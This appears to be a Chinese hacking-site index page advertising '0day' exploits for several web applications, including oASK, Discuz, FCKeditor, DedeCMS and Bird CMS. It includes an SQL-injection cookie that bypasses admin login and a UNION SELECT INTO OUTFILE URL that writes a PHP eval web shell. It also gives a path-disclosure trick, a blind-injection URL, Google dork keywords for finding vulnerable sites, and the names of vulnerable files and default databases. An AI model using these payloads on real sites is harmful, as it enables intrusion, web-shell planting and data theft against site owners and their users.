发布一个oask问答系统的0day 最新版

利用：
用cookie浏览器强制修改cookie为
oASK; ASPSESSIONIDSSDDBADB=HEJJFJNCEOFFIMOBJGHBPHJB; VSN=078349ef024074d5; oASKADM=ADMUPW=a' or '1'='1&ADMUNM=admin' or '1'='1

查看更多...

Tags: oaskoask

http://hackqing.com/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=%27%20union%20select%20NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL%20into%20outfile%20%27E://hackertest.php%27%23%A1%B1
写入SHELL（要开DUMPFILE）
爆路径：http://www.hackqing.com//manyou/admincp.php?my_suffix=%0A%0DTOBY57

查看更多...

Tags: DiscuzDiscuz

首先，说一下。这个可以说是fckeditor 2.63 oday 。目前知道的人比较多了。

http://sitedir.com.cn/fckeditor/editor/filemanager/connectors/test.html

查看更多...

Tags: fckeditorfckeditor

会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS

EXP:

htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';

查看更多...

Tags: dedecmsdedecms

关键字：

inurl:Search.Asp?Range=Product&Keyword=
inurl:ProductBuy.Asp?ProductNo=
inurl: (ProductShow.asp?ID=)

查看更多...

Tags: 良精良精

程序都加入了防注入代码的，在NoSql.asp文件中7kccopyd-code

<%
If EnableStopInjection = True Then
    Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr

查看更多...

Tags: 千博企业网站千博企业网站

漏洞文件：pinglun.asp
代码如下：

<%dim bookid,action
pinglunid=request.QueryString("id")     直接提交

查看更多...

Tags: Shopv8Shopv8

在旁注一个大站的时候,在某个站的后台看见是什么Bird CMS管理系统,记得1.1爆了什么万能密码的漏洞！不知道最新版本的有什么洞子没有！大致的下了套源码看了看,网站管理和程序员都懒了！

//默认数据库 data\data#bird$.mdb

//漏洞文件 product.asp 貌似都没有任何防注入

查看更多...

Tags: BirdBird CMSCMS